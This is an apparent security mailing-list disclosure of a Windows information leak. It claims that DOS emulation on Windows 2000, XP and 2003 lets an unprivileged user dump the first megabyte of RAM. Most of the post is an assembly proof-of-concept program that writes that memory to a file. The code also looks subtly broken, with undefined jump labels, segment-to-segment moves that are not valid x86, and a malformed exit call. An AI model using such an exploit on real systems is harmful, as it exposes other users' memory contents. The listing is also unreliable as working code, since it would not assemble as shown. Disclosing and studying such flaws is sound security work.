[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Windows mem leakage

Desc : Windows Dos emulation allows dumping of first 1 Mo of RAM (with no
particular privilege).

Tested under : Win 2000, XP SP2, 2003

Code :

;---------------- [ dumper.asm ]-----------------------------------------
; Dump first 1 Mo of memory under any MS product
; 1 Mo is the maximum quantity of accessible memory
; in real mode using 16b OSes.
; endrazine, last update : 30/12/2005

code segment
        org 100h
        assume ds:code, es:code, cs:code

        xor ax,ax
        mov si,ax

        mov ah, 09h
        mov dx,offset welcome
        int 21h

        xor ax,ax              ;Wait until key pressed
        int 16h

        mov ah, 3ch                 ; MS DOS Create file Function
        mov dx, offset fname
        xor cx,cx
        int 21h

        mov ax, 3d01h               ; MS DOS Open file Function
        int 21h
        mov handle,ax

        xor ax,ax
        mov ds,ax
        mov myds,ds
        mov cx,32

        push cx

        xor ax,ax
        mov si,ax

        mov di,offset buffer
        mov es,cs

        mov cx,16384

        rep movsw

        mov ds,cs

        xor ax,ax
        mov ah, 40h
        mov bx,handle
        mov cx,32768; +10
        mov dx, offset buffer
        int 21h

        mov ax,myds
;add ax,2047 ;repeat last 16b
        add ax,2048
        mov myds,ax
        mov ds,ax

        pop cx

        loop dabigloop

        mov ax,4ch                  ; Quit
        int 21h

myds dw ?
handle dw ?
welcome db '[ Raw Dos Memory Dumper ]',10,13
        db '',10,13
        db '[ coded by endrazine ]',10,13
        db '',10,13
        db '[ Dumping First Memory chunk to Dump.txt ]',10,13
        db 'Press any key$',10,13
fname db 'Dump.txt',0
buffer db 32768 dup ?
some_canari_separator db '//////////',0
end start


